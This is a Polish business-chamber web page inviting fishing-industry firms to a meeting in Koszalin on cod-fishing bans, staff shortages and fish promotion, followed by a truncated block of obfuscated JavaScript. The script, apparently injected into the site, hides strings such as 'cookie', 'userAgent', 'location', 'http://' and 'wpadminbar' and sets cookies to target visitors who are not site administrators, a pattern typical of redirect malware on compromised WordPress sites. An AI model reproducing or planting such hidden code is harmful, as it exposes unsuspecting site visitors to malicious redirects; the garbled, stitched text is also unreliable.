Spotkanie „Zagrożenia i szanse rozwoju branży rybołówstwa 2019-2021” | Północna Izba Gospodarcza w Koszalinie

Północna Izba Gospodarcza przystąpiła do projektu EXTRA SME, której celem jest wsparcie branży akwakultury, poprawa polityki mającej na celu zwiększenie konkurencyjności MŚP na obszarach przybrzeżnych i wiejskich UE, promowanie na rynkach UE produktów polskich oraz uproszczenia administracyjne, sprzyjające rozwojowi branży.

W związku z organizacją pierwszego spotkania w Koszalinie zapraszamy do udziału
28 sierpnia (środa) o godzinie 11.00 do Park Caffe ul. Asnyka 11, Koszalin. Tematem projektu będzie „Zagrożenia i szanse rozwoju branży rybołówstwa 2019-2021”.

W czasie posiedzenia chcielibyśmy omówić aktualną sytuację rybołówstwa na Pomorzu oraz bariery przedsiębiorców z branży w tym m.in:

  1. Zakaz połowu dorsza przez Komisję Europejską
  2. Braki kadrowe spowodowane zaniechaniem szkolnictwa zawodowego
  3. Promocja konsumpcji ryb i ich przetworów.

Ostatnim elementem, który chcielibyśmy poruszyć na spotkaniu to szanse i perspektywy rozwoju dla branży – dyskusja oraz wnioski, które pozwolą na stabilność rybołówstwa w Polsce oraz wzmocnienie branży na nowych rynkach. Na zakończenie spotkania zapraszamy na wspólny lunch.

Proszę o potwierdzenie obecności pod nr tel.733-837-300

'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m